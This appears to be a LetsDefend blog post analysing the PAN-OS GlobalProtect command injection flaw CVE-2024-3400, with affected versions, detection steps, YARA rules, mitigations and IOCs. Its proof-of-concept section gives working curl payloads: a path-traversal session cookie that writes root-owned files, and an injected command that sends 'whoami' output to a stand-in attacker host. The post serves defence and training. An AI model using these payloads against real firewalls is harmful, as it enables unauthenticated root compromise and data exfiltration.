Command Injection Vulnerability in Palo Alto Networks PAN-OS CVE-2024-3400

Berkay Soylu
April 19, 2024
Command Injection Vulnerability in Palo Alto Networks PAN-OS CVE-2024-3400

CVE-2024-3400 Arbitrary File Creation Leads to OS Command Injection Vulnerability in GlobalProtect, a zero-day vulnerability in Palo Alto Networks PAN-OS. 

As you read you will also learn:

Vulnerability: CVE-2024-3400 Analysis
Introduction: Overview of Pan-OS, mention of SonicWall discovery
CVE-2024-3400: Details on pre-authenticated RCE vulnerability
Severity & Affected Versions: Information on affected versions
Exploitation Status: Vulnerability Exploitation In the Wild
Vulnerability Details: Explanation and details of CVE-2024-3400
What is PaloAlto PAN-OS: Brief description of Palo Alto PAN-OS
Exploitation Overview: General overview of vulnerability and its impact
Proof-of-Concept: Demonstration of exploit with a proof-of-concept
Detection: Identifying Signs of Exploitation of CVE-2024-3400
Mitigations: Suggestions for mitigation for CVE-2024-3400
Conclusion: Summary of key findings and potential risks
References: Citations and sources for further reading
IOC: Indicator Of Compromises of CVE-2024-3400


This report details the discovery and exploitation of a critical zero-day vulnerability (CVE-2024-3400) in Palo Alto Networks GlobalProtect firewall appliances, allowing remote code execution. The article provides insights into vulnerability analysis, exploitation with a proof-of-concept, and detection. By understanding and addressing these vulnerabilities, organizations can improve their security posture and protect their systems from potential malicious attacks.


On April 12th, 2024, Palo Alto Networks announced CVE-2024-3400. CVE-2024-3400 is a CVSS 10 critical arbitrary file-write vulnerability in Palo Alto Networks PAN-OS software versions 10.2, 11.0, and 11.1.  This vulnerability enables unauthenticated attackers to execute arbitrary Linux commands with root-level privileges on affected firewalls if firewalls are configured with a GlobalProtect gateway or portal (or both) and device telemetry enabled.

This blog article aims to provide an analysis of the command injection zero-day vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software, namely CVE-2024-3400. The Palo Alto Networks published the details of CVE-2024-3400, a severe command injection vulnerability with a CVSS score of 10, has unveiled an alarming risk to the system's integrity. This vulnerability have the potential to allow remote code execution (RCE) on affected systems, making them highly critical and deserving of immediate attention.

Malicious activity tracked by Palo Alto Networks under the campaign #OperationMidnightEclipse is targeting CVE-2024-3400, which exploits a vulnerability in certain versions of PAN-OS software.

CVE-2024-3400 is a pre-authenticated RCE flaw that was discovered in PAN-OS. This vulnerability allowing unauthenticated attackers to execute arbitrary code on impacted firewalls, with root privileges. 

By understanding the nature of these vulnerabilities and proactively addressing them, organizations can enhance their security posture and protect their systems from potential malicious attacks. This blog article aims to provide valuable insights into these vulnerabilities, enabling organizations to take the necessary steps to safeguard their infrastructure.

Severity & Affected Versions

A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. The severity for this vulnerability is 10 which is Critical. 

Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.

Versions Affected:

  • CVE-2024-3400: PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1.

This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls configured with GlobalProtect gateway or GlobalProtect portal. Device telemetry does not need to be enabled for PAN-OS firewalls to be exposed to attacks related to this vulnerability.

Exploitation Status

Palo Alto Networks has reported active exploitation of this vulnerability in the wild. Third parties have publicly disclosed proof of concept (POC) of the vulnerability, potentially increasing the risk of exploitation on vulnerable servers.

Vulnerability Details

To have a deeper understanding of the background of the two vulnerabilities and see the exploit in action with a proof-of-concept, first, we set up our lab, then talk about the issues in general and then on a technical level.

What is PAN-OS & GlobalProtect?

PAN-OS and GlobalProtect are both products of Palo Alto Networks.

PAN-OS is the operating system used by Palo Alto Networks' next-generation firewalls. It provides the core functionality and features for these firewalls, including network security, threat prevention, and management capabilities.

The ‘GlobalProtect’ is Palo Alto’s SSLVPN implementation, and this command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations is what enables the unauthenticated attacker to execute arbitrary code with root privileges on the firewall.

Analysis of CVE-2024-3400?

A critical command injection vulnerability has been identified in Palo Alto Networks PAN-OS software, specifically affecting versions PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1. This vulnerability, designated as CVE-2024-3400, has a CVSS v3.x rating of 10 out of 10, indicating its a critical severity.

The vulnerability allows an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. It is important to note that this issue is specifically applicable to firewalls configured with the GlobalProtect gateway or GlobalProtect portal, or both. It is not necessary for device telemetry to be enabled for PAN-OS firewalls to be susceptible to attacks exploiting this vulnerability. 

CVE-2024-3400 consists of two main parts: Arbitrary File Creation and Arbitrary Command Injection. The details are explained in the image below:

Zero-day exploitation of a vulnerability in Palo Alto Global Protect firewall devices that allowed for unauthenticated remote code execution to take place. Initial exploitation was used to create a reverse shell, download tools, exfiltrate configuration data, and move laterally within the network.

The threat actor has developed and attempted to deploy a novel python-based backdoor that Volexity calls UPSTYLE.

UPSTYLE Sample Recorded on Virustotal

The UPSTYLE backdoor allows the attacker to execute additional commands on the device via specially crafted network requests. 

The purpose of the script is to deploy a backdoor to the following path: /usr/lib/python3.6/site-packages/system.pth. The backdoor, written in Python, starts by an import and its main content is stored as a base64 encoded blob. Therefore, by creating this file, each time any other code on the device attempts to import the module, the malicious code is executed.

Given the potential for Remote Code Execution (RCE), there are numerous possible exploitation scenarios when attackers have the ability to exploit this vulnerability. It is imperative for organizations to promptly address this issue to safeguard their PAN-OS firewalls from potential exploitation.

Exploitation of CVE-2024-3400 (POC)

CVE-2024-3400, a critical vulnerability in PAN-OS within the GlobalProtect feature, involves a sequence of security weaknesses: Path Traversal, Arbitrary File Creation, and OS Command Injection. This combination of vulnerabilities allows attackers to do remote code execution, posing a significant risk to the affected systems.

  1. The vulnerability begins with a Path Traversal flaw, enabling attackers to access directories and files outside of the intended scope

  2. Subsequently, the vulnerability allows for the creation of arbitrary files anywhere on the system. As these files are created with root privileges.

  3. The most severe aspect of this vulnerability is the OS Command Injection. The telemetry service, which operates via a scheduled task located in /etc/cron.d/device_telemetry_send, is susceptible to command injection through the file name parameter. Attackers can exploit this by injecting malicious commands into the file names. When the telemetry service processes these files using the /usr/local/bin/dt_send and /usr/local/bin/dt_curl scripts, the injected commands will be executed with root privileges, allowing the attacker to run arbitrary code on the vulnerable PAN-OS system.

Arbitrary File Creation

The GlobalProtect application can be accessed from web interface. GlobalProtect serves an HTTPS service on port 443.

The web server sets a SESSID cookie for unauthenticated sessions and the data affiliated with the session cookie is placed in /tmp/sslvpn.

curl https://hostname/global-protect/login.esp -k -H 'Cookie: SESSID=./../../../var/appweb/sslvpndocs/global-protect/portal/images/letsdefend.txt'

By sending the given request we were able to create file with root privileges.

Checking the session directory confirms that the data was written in the related path.

Command Injection Exploitation

The vulnerability allows an attacker to create empty files with any name anywhere on the system as the root user. We've also found that the telemetry service can be exploited through a command injection by manipulating the file name parameter. As explained in the attackerb analysis:

  • The telemetry service runs regularly through a scheduled task, or cron job, located in /etc/cron.d/device_telemetry_send
  • The script /usr/local/bin/dt_send checks the /opt/panlogs/tmp/device_telemetry/hour and /opt/panlogs/tmp/device_telemetry/day directories for any new files. 
  • It then sends the file names in a cURL request every hour using the /usr/local/bin/dt_curl script.

Considering this, attackers could potentially inject malicious commands into the file names, which would be executed when the telemetry service processes them.

curl https://hostname/global-protect/login.esp -k -H 'Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}attacker:4444?user=$(whoami)`'

To replicate this we send an unauthenticated cURL request with a forged payload in the SESSID cookie value to the GlobalProtect web server in order to initiate remote code execution. The payload will be executed and deleted from the telemetry directory when the server runs its telemetry transmission function once per hour.

On the attacker machine, a Python web server receives a GET request that indicates our code was executed with root privileges.

Detection of CVE-2024-3400

Effective detection plays a crucial role in addressing this vulnerability. It is essential to have a comprehensive understanding of log paths, the utilization of relevant security products, and knowing where to look for potential indicators, enhancing the overall detection strategy.

Palo Alto Networks suggests the following steps for a quick check to identify attempted exploit activity in their writing.

  • The following command can be used from the PAN-OS CLI to help identify if there was an attempted exploit activity on the device:
grep pattern "failed to unmarshal session(.\+.\/" mp-log gpsvc.log*‍

  • If the value between "session(" and ")" does not look like a GUID, but instead contains a file system path or embedded shell commands, this could be related to an attempted exploitation of CVE-2024-3400, which will warrant further investigation to correlate with other indicators of compromise.

  • Grep output indicating an attempted exploit may look like the following entry:
failed to unmarshal session(../../some/path)

  • Grep output indicating normal behavior will typically appear like the following entry:
failed to unmarshal session(01234567-89ab-cdef-1234-567890abcdef)

Identifying Signs of Exploitation

Successful exploitation may result in artifacts being left in several directories and log files used by PAN-OS.

The NGINX frontend web server, responsible for proxying requests to the GlobalProtect service, logs all HTTP requests to /var/log/nginx/sslvpn_access.log.

Likewise, the file /var/log/pan/sslvpn-access/sslvpn-access.log will also record the HTTP requests, as demonstrated below:

When targeting the device telemetry for command injection, the attacker may place a file with zero length in one of the subdirectories within /opt/panlogs/tmp/device_telemetry/, such as /opt/panlogs/tmp/device_telemetry/hour/ or /opt/panlogs/tmp/device_telemetry/day/. This file's name will likely include characters suitable for command injection. Therefore, the contents of this directory and its subdirectories should be examined for any suspicious zero-length files.

The log file /var/log/pan/device_telemetry_send.log will display the injected command.

Threat Hunting Queries 

The Unit42 team has created XQL queries to search for signs of exploitation. These queries can assist in understanding the hunt for CVE-2024-3400.

Unit 42 Managed Threat Hunting Queries

Yara Rules 

To detect the exploitation of CVE-2024-3400, you can use public yara rules written by Cyber security community. Here are yara rules that detects exploitation attempts of CVE-2024-3400.

                    rule APT_UTA028_ForensicArtefacts_PaloAlto_CVE_2024_3400_Apr24_1 : SCRIPT {
  	description = "Detects forensic artefacts of APT UTA028 as found in a campaign exploiting the Palo Alto CVE-2024-3400 vulnerability"
  	author = "Florian Roth"
  	reference = ""
  	date = "2024-04-15"
  	modified = "2024-04-18"
  	score = 70
  	$x1 = "cmd = base64.b64decode("
  	$x2 = "f.write(\"/*\"+output+\"*/\")"

  	$x3 = "* * * * * root wget -qO- http://"
  	$x4 = "rm -f /var/appweb/sslvpndocs/global-protect/*.css"

  	$x5a = "failed to unmarshal session(../" //
  	$x5b = "failed to unmarshal session(./../" // customer data

  	$x6 = "rm -rf /opt/panlogs/tmp/device_telemetry/minute/*" base64
  	$x7 = "$(uname -a) > /var/" base64
  	1 of them


CVE-2024-3400 Yara Rules

                    rule EXPL_PaloAlto_CVE_2024_3400_Apr24_1 {
  	description = "Detects characteristics of the exploit code used in attacks against Palo Alto GlobalProtect CVE-2024-3400"
  	author = "Florian Roth"
  	reference = ""
  	date = "2024-04-15"
  	score = 70
  	$x1 = "SESSID=../../../../opt/panlogs/"
  	$x2 = "SESSID=./../../../../opt/panlogs/"
  	$sa1 = "SESSID=../../../../"
  	$sa2 = "SESSID=./../../../../"
  	$sb2 = "${IFS}"
  	1 of ($x*)
  	or (1 of ($sa*) and $sb2)


CVE-2024-3400 Yara Rules

LetsDefend Simulated SOC Alerts

On the LetsDefend platform, you can practice by analyzing the latest zero-days in a realistic SOC environment. You can investigate EventID:249 - SOC274 - Palo Alto Networks PAN-OS Command Injection Vulnerability Exploitation (CVE-2024-3400) and learn how attackers exploit vulnerabilities to gain unauthorized access and execute malicious code.

Mitigations And Recommendations

  • To mitigate this vulnerability, it is advised customers to upgrade to the following fixed versions of PAN-OS:
    - PAN-OS 10.2.9-h1
    - PAN-OS 11.0.4-h1
    - PAN-OS 11.1.2-h3
    and all later PAN-OS versions. Upgrading to these versions will provide full protection against the vulnerability.

  • You can monitor for suspicious network activities until the patch for a clean version is applied. During this process, establish rules on security products to monitor network connections, generating alerts until the patching is completed.

  • Customers can also mitigate the vulnerability by enabling Threat ID 95187 if they have a Threat Prevention subscription

  • To enhance your understanding of exploiting the relevant vulnerability in a real-world scenario, you can improve your analysis skills by resolving the "EventID:249 - SOC274 - Palo Alto Networks PAN-OS Command Injection Vulnerability Exploitation (CVE-2024-3400)" alert in the LetsDefend Training section. This will provide you with more detailed insights into the vulnerability, allowing you to enhance your proficiency in vulnerability analysis.

  • Organisations with a Threat Prevention subscription can temporarily mitigate the CVE-2024-3400 by enabling Threat ID 95187, 95189 and 95191 .

  • The vulnerability has been remediated in hotfix releases of PAN-OS 10.2.9-h1, PAN-OS 11.0.4-h1, PAN-OS 11.1.2-h3, and in all later PAN-OS versions. Organisations are required to implement these security updates as soon as possible.


In conclusion, it is crucial to promptly apply the necessary patch for a clean version in order to address any vulnerabilities in the system. Additionally, establishing rules on security products to monitor processes and network connections can help generate alerts and ensure that the patching process is completed effectively. By resolving the "EventID:249 - SOC274 - Palo Alto Networks PAN-OS Command Injection Vulnerability Exploitation (CVE-2024-3400)" alert in the LetsDefend Training section, individuals can further develop their analysis skills and gain a deeper understanding of relevant vulnerabilities. This will ultimately enhance proficiency in vulnerability analysis and contribute to overall system security.

Indicator Of Compromise (IOC)

Public shared IOCs can be found on AlienVault OTX or in the volexity / threat-intel github repository

CVE-2024-3400 IOC on OTX

Value Entity Type Description
198[.]58[.]109[.]149 ipaddress Server used by the attacker to host malicious files
144[.]172[.]79[.]92 ipaddress Server used by the attacker to host malicious files
172[.]233[.]228[.]93 ipaddress Server used by the attacker to host malicious files
3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac file UPSTYLE webshell
35a5f8ac03b0e3865b3177892420cb34233c55240f452f00f9004e274a85703c file Reverse shell script
755f5b8bd67d226f24329dc960f59e11cb5735b930b4ed30b2df77572efb32e8 file Reverse shell script
adba167a9df482aa991faaa0e0cde1182fb9acfbb0dc8d19148ce634608bab87 file Post exploitation script
c1a0d380bf55070496b9420b970dfc5c2c4ad0a598083b9077493e8b8035f1e9 file Post exploitation script
fe07ca449e99827265ca95f9f56ec6543a4c5b712ed50038a9a153199e95a0b7 file Post exploitation script
96dbec24ac64e7dd5fef6e2c26214c8fe5be3486d5c92d21d5dcb4f6c4e365b9 file Post exploitation script
448fbd7b3389fe2aa421de224d065cea7064de0869a036610e5363c931df5b7c file GOST sample
e315907415eb8cfcf3b6a4cd6602b392a3fe8ee0f79a2d51a81a928dbce950f8 file Post exploitation script
161fd76c83e557269bee39a57baa2ccbbac679f59d9adff1e1b73b0f4bb277a6 file Reverse shell Go sample
71[.]9[.]135[.]100 ipaddress Compromised ASUS router used by attacker to interact with compromised devices
89[.]187[.]187[.]69 ipaddress Surfshark VPN address used in exploitation attempts.
nhdata[.]s3-us-west-2[.]amazonaws[.]com hostname Compromised S3 bucket used to host files by UTA0218
23[.]242[.]208[.]175 ipaddress Compromised ASUS router used by attacker to interact with compromised devices
137[.]118[.]185[.]101 ipaddress Compromised ASUS router used by attacker to interact with compromised devices
66[.]235[.]168[.]222 ipaddress Surfshark VPN address used in exploitation attempts.


letsdefend description card

You might also be interested in ...

Start learning cybersecurity today